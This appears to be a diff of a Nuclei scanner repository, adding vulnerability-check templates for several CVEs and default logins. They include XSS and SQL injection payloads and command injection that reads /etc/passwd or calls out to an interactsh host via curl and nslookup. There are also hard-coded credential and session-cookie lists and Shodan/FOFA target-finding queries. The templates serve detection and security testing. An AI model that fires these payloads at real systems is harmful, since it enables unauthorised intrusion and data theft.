Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}
Accept-Encoding: gzip, deflate
user={{username}}&pass={{password}}
- |
POST /rpc.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: {{RootURL}}/sysinfo.cgi?xnavigation=1
Accept-Encoding: gzip, deflate
OBJECT Socket;print "Content-Type: text/plain\n\n";$cmd={{cmd}};print "$cmd\n\n";
attack: pitchfork
payloads:
username:
- admin
- root
password:
- admin
- root
stop-at-first-match: true
host-redirects: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: regex
part: body_2
regex:
- 'uid=(\d+)\(.*?\) gid=(\d+)\(.*?\) groups=(\d+)\(.*?\)'
- type: word
part: body_2
words:
- "Content-type: text/plain"
- type: status
status:
- 200

55
http/cves/2020/CVE-2020-28185.yaml Normal file
View File

@ -0,0 +1,55 @@
id: CVE-2020-28185
info:
name: TerraMaster TOS < 4.2.06 - User Enumeration
author: pussycat0x
severity: medium
description: |
User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php.
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TerraMaster%20TOS%20%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E6%BC%8F%E6%B4%9E%20CVE-2020-28185.md
- https://nvd.nist.gov/vuln/detail/CVE-2020-28185
- https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
metadata:
fofa-query: '"TerraMaster" && header="TOS"'
max-request: 2
verified: true
tags: cve,cve2020,terramaster,enum,tos
http:
- raw:
- |
GET /tos/index.php?user/login HTTP/1.1
Host: {{Hostname}}
- |
POST /wizard/initialise.php HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: {{RootURL}}/tos/index.php?user/login
tab=checkuser&username=admin
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "username"
- "email"
- "status"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body_2
regex:
- '"username":"(.*?)"'
- '"email":"(.*?)"'

5
http/cves/2021/CVE-2021-1497.yaml
View File

@ -24,11 +24,12 @@ info:
max-request: 2
vendor: cisco
product: hyperflex_hx_data_platform
tags: cve,cve2021,cisco,rce,oast,kev,packetstorm,
tags: cve,cve2021,cisco,rce,oast,kev,packetstorm
variables:
cmd: 'curl http://{{interactsh-url}} -H \"User-Agent: {{useragent}}\"'
payload: '123",""$6$$)); import os;os.system("{{cmd}}");print(crypt.crypt("'
useragent: '{{rand_base(6)}}'
cmd: 'curl http://{{interactsh-url}} -H \"User-Agent: {{useragent}}\"'
http:
- raw:

40
http/cves/2021/CVE-2021-22707.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2021-22707
info:
name: EVlink City < R8 V3.4.0.1 - Authentication Bypass
author: ritikchaddha,dorkerdevil
severity: critical
description: |
A CWE-798: Use of Hard-coded Credentials vulnerability exists in EVlink City (EVC1S22P4 / EVC1S7P4 all versions prior to R8 V3.4.0.1), EVlink Parking (EVW2 / EVF2 / EV.2 all versions prior to R8 V3.4.0.1), and EVlink Smart Wallbox (EVB1A all versions prior to R8 V3.4.0.1 ) that could allow an attacker to issue unauthorized commands to the charging station web server with administrative privileges.
reference:
- https://codeberg.org/AmenoCat/CVE-2021-22707-PoC/raw/branch/main/exploit.sh
- https://nvd.nist.gov/vuln/detail/CVE-2021-22707
classification:
cve-id: CVE-2021-22707
metadata:
max-request: 1
verified: true
shodan-query: title:"EVSE web interface"
fofa-query: title="EVSE web interface"
tags: cve,cve2021,evlink,auth-bypass
http:
- raw:
- |
GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: CURLTOKEN=b35fcdc1ea1221e6dd126e172a0131c5a; SESSIONID=admin
host-redirects: true
max-redirects: 2
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
words:
- '?worker=Cluster" name="cluster" id="id_cluster'
- type: status
status:
- 200

45
http/cves/2021/CVE-2021-24409.yaml Normal file
View File

@ -0,0 +1,45 @@
id: CVE-2021-24409
info:
name: Prismatic < 2.8 - Cross-Site Scripting
author: Harsh
severity: medium
description: |
The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator
remediation: Fixed in version 2.8
reference:
- https://wpscan.com/vulnerability/ae3cd3ed-aecd-4d8c-8a2b-2936aaaef0cf
- https://nvd.nist.gov/vuln/detail/CVE-2021-24409
classification:
cve-id: CVE-2021-24409
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
metadata:
max-request: 2
verified: true
publicwww-query: "/wp-content/plugins/prismatic"
tags: cve,cve2023,wordpress,wp,wp-plugin,xss,prismatic,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/options-general.php?page=prismatic&tab=%22+style%3Danimation-name%3Arotation+onanimationend%3Dalert(document.domain)%2F%2F%22 HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(header_2, "text/html")'
- 'contains(body_2, "Leave A Review?")'
- 'contains(body_2, "onanimationend=alert(document.domain)")'
condition: and

43
http/cves/2021/CVE-2021-25065 Normal file
View File

@ -0,0 +1,43 @@
id: CVE-2021-25065
info:
name: Smash Balloon Social Post Feed < 4.1.1 - Authenticated Reflected Cross-Site Scripting
author: Harsh
severity: medium
description: |
The plugin was affected by a reflected XSS in custom-facebook-feed in cff-top admin page.
remediation: Fixed in version 2.19.2
reference:
- https://wpscan.com/vulnerability/ae1aab4e-b00a-458b-a176-85761655bdcc
- https://wordpress.org/plugins/custom-facebook-feed/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cwe-id: CWE-79
metadata:
max-request: 2
verified: true
publicwww-query: "/wp-content/plugins/custom-facebook-feed/"
tags: cve,cve2021,wpscan,wordpress,wp-plugin,xss,wp,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=cff-top&cff_access_token=xox%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert(document.domain)%3E&cff_final_response=true HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "<img src onerror=alert(document.domain)>")'
- 'contains(body_2, "custom-facebook-feed")'
condition: and

15
http/cves/2021/CVE-2021-36260.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2021-36260
info:
name: Hikvision IP camera/NVR - Remote Command Execution
author: pdteam,gy741
author: pdteam,gy741,johnk3r
severity: critical
description: Certain Hikvision products contain a command injection vulnerability in the web server due to the insufficient input validation. An attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.
reference:
@ -32,20 +32,15 @@ http:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
<?xml version="1.0" encoding="UTF-8"?><language>$(id>webLib/x)</language>
<?xml version="1.0" encoding="UTF-8"?><language>$(cat /etc/passwd>webLib/x)</language>
- |
GET /x HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(body_2,'uid=') && contains(body_2,'gid=')"
- "status_code_1 == 500 && status_code_2 == 200"
condition: and
extractors:
- type: regex
part: body
regex:
- "(u|g)id=.*"
- "root:.*:0:0:"

38
http/cves/2022/CVE-2022-24384.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2022-24384
info:
name: SmarterTools SmarterTrack - Cross-Site Scripting
author: E1A
severity: medium
description: |
Cross-site Scripting (XSS) vulnerability in SmarterTools SmarterTrack This issue affects: SmarterTools SmarterTrack 100.0.8019.14010.
reference:
- https://csirt.divd.nl/CVE-2022-24384
- https://csirt.divd.nl/DIVD-2021-00029
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-24384
cwe-id: CWE-79
cpe: cpe:2.3:a:smartertools:smartertrack:*:*:*:*:*:*:*:*
epss-score: 0.00079
metadata:
max-request: 1
product: smartertrack
shodan-query: http.favicon.hash:1410071322
vendor: smartertools
verified: true
tags: cve,cve2022,xss,smartertrack
http:
- raw:
- |+
GET /Main/Default.aspx?viewSurveyError=Unknown+survey"><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
words:
- '"type":"error","text":"Unknown survey\"><img src=x onerror=alert(document.domain)>"'
- 'smartertrack'
condition: and

46
http/cves/2022/CVE-2022-46443.yaml Normal file
View File

@ -0,0 +1,46 @@
id: CVE-2022-46443
info:
name: Bangresto - SQL Injection
author: Harsh
severity: high
description: |
Bangresto 1.0 is vulnberable to SQL Injection via the itemqty%5B%5D parameter.
reference:
- https://yuyudhn.github.io/CVE-2022-46443/
- https://nvd.nist.gov/vuln/detail/CVE-2022-46443
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-46443
cwe-id: CWE-89
metadata:
max-request: 2
verified: true
tags: cve,cve2022,bangresto,sqli
variables:
num: "999999999"
http:
- raw:
- |
POST /bangresto-main/staff/process.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
username={{username}}&password={{password}}
- |
POST /bangresto-main/staff/insertorder.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded;
itemID[]=1&itemqty[]=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a7a6b71,md5({{num}}),0x7178717a71,0x78))s), 8446744073709551610, 8446744073709551610)))&sentorder=Sent to kitchen
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
words:
- '{{md5({{num}})}}'

50
http/cves/2023/CVE-2023-26067.yaml Normal file
View File

@ -0,0 +1,50 @@
id: CVE-2023-26067
info:
name: Lexmark Printers - Command Injection
author: DhiyaneshDK
severity: high
description: |
Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).
reference:
- https://www.horizon3.ai/lexmark-command-injection-vulnerability-zdi-can-19470-pwn2own-toronto-2022/
- https://github.com/horizon3ai/CVE-2023-26067
- https://nvd.nist.gov/vuln/detail/CVE-2023-26067
- https://publications.lexmark.com/publications/security-alerts/CVE-2023-26067.pdf
- https://support.lexmark.com/alerts/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2023-26067
cwe-id: CWE-20
epss-score: 0.00145
cpe: cpe:2.3:o:lexmark:cxtpc_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
shodan-query: "Server: Lexmark_Web_Server"
vendor: lexmark
product: cxtpc_firmware
tags: cve,cve2023,printer,iot,lexmark
variables:
cmd: 'nslookup {{interactsh-url}}'
http:
- raw:
- |
POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Content-Length: 49
FT_Custom_lbtrace=$({{cmd}})
matchers:
- type: dsl
dsl:
- contains(interactsh_protocol, 'dns')
- contains(body, 'Fax Trace Settings')
- status_code == 200
condition: and

41
http/cves/2023/CVE-2023-4174.yaml Normal file
View File

@ -0,0 +1,41 @@
id: CVE-2023-4174
info:
name: mooSocial 3.1.6 - Reflected Cross Site Scripting
author: momika233
severity: medium
description: |
A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.
reference:
- https://www.exploit-db.com/exploits/51671
- https://nvd.nist.gov/vuln/detail/CVE-2023-4174
- https://packetstormsecurity.com/files/174017/Social-Commerce-3.1.6-Cross-Site-Scripting.html
metadata:
max-request: 5
verified: true
fofa-query: icon_hash="702863115"
tags: cve,cve2023,moosocial,xss
http:
- method: GET
path:
- '{{BaseURL}}/search/index?q="><img+src=a+onerror=alert(document.domain)>ridxm'
- '{{BaseURL}}/stores"><img+src=a+onerror=alert(document.domain)>ridxm/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent'
- '{{BaseURL}}/user_info"><img+src=a+onerror=alert(document.domain)>ridxm/index/friends'
- '{{BaseURL}}/faqs"><img+src=a+onerror=alert(document.domain)>ridxm/index?content_search="><img+src=a+onerror=alert(document.domain)>ridxm'
- '{{BaseURL}}/classifieds"><img+src=a+onerror=alert(document.domain)>ridxm/search?category=1'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img src=a onerror=alert(document.domain)>ridxm"
- "mooSocial"
condition: and
- type: word
part: header
words:
- "text/html"

44
http/cves/CVE-2015-9323.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2015-9323
info:
name: 404 to 301 <= 2.0.2 - Authenticated Blind SQL Injection
author: Harsh
severity: critical
description: |
The 404 to 301 Redirect, Log and Notify 404 Errors WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability.
remediation: Fixed in version 2.0.3
reference:
- https://wpscan.com/vulnerability/61586816-dd2b-461d-975f-1989502affd9
- http://cinu.pl/research/wp-plugins/mail_e28f19a8f03f0517f94cb9fea15d8525.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-89
metadata:
verified: true
max-request: 2
tags: cve,cve2015,404-to-301,sqli,wpscan,wp-plugin,wp,wordpress,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
@timeout: 15s
GET /wp-admin/admin.php?page=i4t3-logs&orderby=(SELECT+*+FROM+(SELECT+SLEEP(5))XXX)--+- HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "404-to-301")'
condition: and

16
http/default-logins/bloofoxcms-default-login.yaml
View File

@ -31,15 +31,11 @@ http:
password:
- "admin"
matchers-condition: and
redirects: true
max-redirects: 2
matchers:
- type: word
part: header
words:
- 'text/html'
- 'index.php'
- type: dsl
dsl:
- contains(body, 'bloofoxCMS Admincenter')
- status_code == 200
condition: and
- type: status
status:
- 302

53
http/default-logins/openmediavault/openmediavault-default-login.yaml Normal file
View File

@ -0,0 +1,53 @@
id: openmediavault-default-login
info:
name: OpenMediaVault - Default Login
author: DhiyaneshDK
severity: high
reference:
- https://forum.openmediavault.org/index.php?thread/7784-default-login/
- https://soltveit.org/openmediavault-default-password/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
max-request: 1
verified: true
shodan-query: title:"OpenMediaVault"
tags: default-login,openmediavault
http:
- raw:
- |
POST /rpc.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"service":"Session","method":"login","params":{"username":"{{username}}","password":"{{password}}"},"options":null}
attack: pitchfork
payloads:
username:
- admin
password:
- openmediavault
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"authenticated":true'
- '"permissions":'
condition: and
- type: word
part: header
words:
- application/json
- type: status
status:
- 200

61
http/default-logins/webmin-default-login.yaml Normal file
View File

@ -0,0 +1,61 @@
id: webmin-default-login
info:
name: Webmin - Default Login
author: pussycat0x
severity: high
description: |
Webmin default login credentials were discovered.
reference:
- https://webmin.com/
- https://doxfer.webmin.com/Webmin/Installing_Webmin
classification:
cwe-id: CWE-798
metadata:
max-request: 2
verified: true
shodan-query: title:"Webmin"
tags: webmin,default-login
http:
- raw:
- |
POST /session_login.cgi HTTP/1.1
Host: {{Hostname}}
Cookie: redirect=1; testing=1
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}
Accept-Encoding: gzip, deflate
user={{username}}&pass={{password}}
- |
GET /sysinfo.cgi HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: {{RootURL}}
Accept-Encoding: gzip, deflate
attack: pitchfork
payloads:
username:
- admin
password:
- admin
host-redirects: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Webmin"
- "Backup Configuration Files"
- "Webmin Actions Log"
condition: and
- type: status
status:
- 200

30
http/exposed-panels/acti-panel.yaml Normal file
View File

@ -0,0 +1,30 @@
id: acti-panel
info:
name: ACTi Video Monitoring Panel - Detection
author: DhiyaneshDk
severity: info
metadata:
max-request: 1
verified: true
fofa-query: app="ACTi-视频监控"
shodan-query: title:"Web Configurator" html:"ACTi"
tags: acti,panel,login,detect
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/videoconfiguration.cgi"
matchers-condition: and
matchers:
- type: word
words:
- 'Web Configurator'
- 'ACTi'
condition: and
case-insensitive: true
- type: status
status:
- 200

28
http/exposed-panels/evlink/evlink-panel.yaml Normal file
View File

@ -0,0 +1,28 @@
id: evlink-panel
info:
name: EVlink Local Controller - Detection
author: ritikchaddha
severity: info
metadata:
max-request: 1
verified: true
shodan-query: title:"EVlink Local Controller"
fofa-query: title="EVlink Local Controller"
tags: panel,evlink,login,detect
http:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "EVlink Local Controller</title>"
- type: status
status:
- 200

32
http/exposed-panels/evlink/evse-web-panel.yaml Normal file
View File

@ -0,0 +1,32 @@
id: evse-web-panel
info:
name: EVSE Web Interface Panel - Detection
author: ritikchaddha
severity: info
metadata:
max-request: 2
verified: true
shodan-query: title:"EVSE Web Interface"
fofa-query: title="EVSE Web Interface"
tags: panel,evlink,evse,login,detect
http:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/cgi-bin/cgiServer?worker=LoginForm"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "EVSE Web Interface</title>"
- "Charging station</title>"
condition: or
- type: status
status:
- 200

9
http/exposed-panels/sonarqube-login.yaml
View File

@ -18,8 +18,13 @@ http:
path:
- "{{BaseURL}}/sessions/new"
matchers-condition: and
matchers:
- type: word
words:
- "<title>SonarQube</title>"
part: body
words:
- "SonarQube"
- type: status
status:
- 200

Some files were not shown because too many files have changed in this diff Show More